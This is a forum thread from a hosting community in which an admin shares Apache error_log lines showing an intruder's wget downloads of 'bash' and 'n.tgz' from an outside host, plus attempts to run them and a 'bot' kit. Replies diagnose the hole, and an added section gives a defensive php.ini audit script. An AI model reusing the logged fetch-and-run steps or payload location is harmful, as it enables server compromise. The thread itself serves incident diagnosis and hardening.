The Community Forums


Attacks agains Apache in error_log

Discussion in 'EasyApache' started by carock, Aug 22, 2005.

  1. carock

    carock Well-Known Member

    Joined:
    Sep 25, 2002
    Messages:
    232
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    St. Charles, MO
    I'm trying to figure out how my box is being attacked. I'm looking at the Apache error_log and I find entries like this every once in a while...

    [Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/images/form.5B4jpg
    [Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/404.shtml
    --08:11:31-- http://wget/
    => `index.html'
    Resolving wget... failed: Host not found.
    --08:11:31-- http://members.lycos.co.uk/icetriton/bash
    => `bash'
    Resolving members.lycos.co.uk... done.
    Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 18,649 [text/plain]

    0K .......... ........ 100% 56.38 KB/s

    08:11:32 (56.38 KB/s) - `bash' saved [18649/18649]


    FINISHED --08:11:32--
    Downloaded: 18,649 bytes in 1 files
    sh: line 1: ./bash: Permission denied
    sh: line 1: cd: /var/spool/samba: No such file or directory
    sh: line 1: lwget: command not found
    tar (child): n.tgz: Cannot open: No such file or directory
    tar (child): Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Error exit delayed from previous errors
    sh: line 1: cd: bot: No such file or directory
    [Mon Aug 22 08:20:01 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
    [Mon Aug 22 08:20:15 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/images/rollovers/sun$
    [Mon Aug 22 08:20:15 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
    [Mon Aug 22 08:20:22 2005] [error] [client 65.54.188.137] File does not exist: /home/amig/public_html/news/1999/0425-amiga.shtml
    [Mon Aug 22 08:20:22 2005] [error] [client 65.54.188.137] File does not exist: /home/amig/public_html/404.shtml
    --08:22:01-- http://members.lycos.co.uk/icetriton/n.tgz
    => `n.tgz'
    Resolving members.lycos.co.uk... done.
    Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 217,288 [text/plain]

    0K .......... .......... .......... .......... .......... 23% 80.65 KB/s
    50K .......... .......... .......... .......... .......... 47% 318.47 KB/s
    100K .......... .......... .......... .......... .......... 70% 314.47 KB/s
    150K .......... .......... .......... .......... .......... 94% 337.84 KB/s
    200K .......... .. 100% 1.70 MB/s

    08:22:03 (194.50 KB/s) - `n.tgz' saved [217288/217288]

    sh: line 1: ./bash: Permission denied
    -----------------------------------------------------------
    and so on.

    The weird thing is all the regular log entries in the middle. There's no request or source IPs logged, so I don't know where to go to find out how this person is getting files to upload on the server.

    Anyone deal with this before? I have Apache 1.3.33 and WHM 10.1.0 cPanel 10.2.0-S83 on RedHat 9

    Thanks,
    Chuck
     
  2. romanh

    romanh Member

    Joined:
    Feb 27, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    I have the same errors right now

    I have the same errors right now.
    I found that it is an issue of OpenSSL.
    For an attacker it is possible to gain a shell.
    The attacker usually saves the file to the /tmp or /var/tmp directory.
    He usually runs some 'bot' scripts for IRC, DCC, ...

    I have CentOS 3 and I'm going to reinstall my box to Fedora Core 4.
    CentOS does not provide the OpenSSL updates.
    Also I think it will be the same with Fedora 4, but I'll try to build OpenSSL from source
    so later I can easily patch it.

    Roman
     
  3. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    What did you do to secure your server? Do you have a system-based firewall including Mod Security, Mod Evasive, APF and BFD? Are they configured properly and do they have a very good set of rules?

    Do you see any unusual server load?
     
  4. romanh

    romanh Member

    Joined:
    Feb 27, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    I have just APF

    I have just APF installed.
    This is the versions on my box

    Apache 1.3.34

    OpenSSL 0.9.7a

    PHP 4.4.2
     
  5. romanh

    romanh Member

    Joined:
    Feb 27, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Found a solution

    It is a quite well-known bug in PHP.
    To solve this I had to set allow_url_fopen = Off in php.ini
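With `allow_url_fopen = On`, PHP's file functions and `include`/`require` accept `http://` and `ftp://` URLs, so a script that builds an include path from unvalidated request input can be made to fetch and execute code from a remote host, which is consistent with the wget-and-run output seen in the logs above. A small audit of php.ini for this setting, as an added example and not code from the thread, follows; the php.ini fragments are constructed, the defaults it assumes are PHP's documented ones (`allow_url_fopen` defaults to On), and `allow_url_include` is a later directive (PHP 5.2 onwards) that did not exist for the PHP 4.4.2 the poster ran.

```python
# Constructed php.ini fragment with the weak setting (not the poster's file).
WEAK_INI = """\
;;;;;;;;;;;;;;;;;;
; Fopen wrappers ;
;;;;;;;;;;;;;;;;;;
allow_url_fopen = On
display_errors = Off
"""

# The corrected fragment, as recommended in the thread.
HARDENED_INI = """\
allow_url_fopen = Off
allow_url_include = Off   ; only meaningful on PHP 5.2+, harmless elsewhere
display_errors = Off
"""


def parse_ini(text):
    """Minimal php.ini reader: strips ';' comments, ignores [sections], keys lower-cased."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def ini_bool(value, default):
    """Interpret a php.ini boolean the way PHP does (On/1/True/Yes vs Off/0/False/No/None)."""
    if value is None:
        return default
    v = value.lower()
    if v in ("1", "on", "true", "yes"):
        return True
    if v in ("0", "off", "false", "no", "none", ""):
        return False
    return default


def audit_url_wrappers(ini_text):
    """Return a list of findings; an empty list means the remote-URL wrappers are disabled."""
    s = parse_ini(ini_text)
    findings = []
    # PHP ships with allow_url_fopen enabled, so a missing key counts as On.
    if ini_bool(s.get("allow_url_fopen"), default=True):
        findings.append("allow_url_fopen is On: fopen()/file()/include() will fetch remote URLs")
    # allow_url_include (PHP 5.2+) defaults to Off; flag it only if explicitly enabled.
    if ini_bool(s.get("allow_url_include"), default=False):
        findings.append("allow_url_include is On: include()/require() accept remote URLs")
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit_url_wrappers(ini) or ["ok"])
```

Point `audit_url_wrappers` at the text of the php.ini PHP actually loads (the path shown by `php -i` or `phpinfo()`); per-directory overrides via `.htaccess` `php_flag` or `php_admin_flag` in httpd.conf are not seen by a plain file audit, so confirm the effective value with `ini_get('allow_url_fopen')` from a test script as well.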
     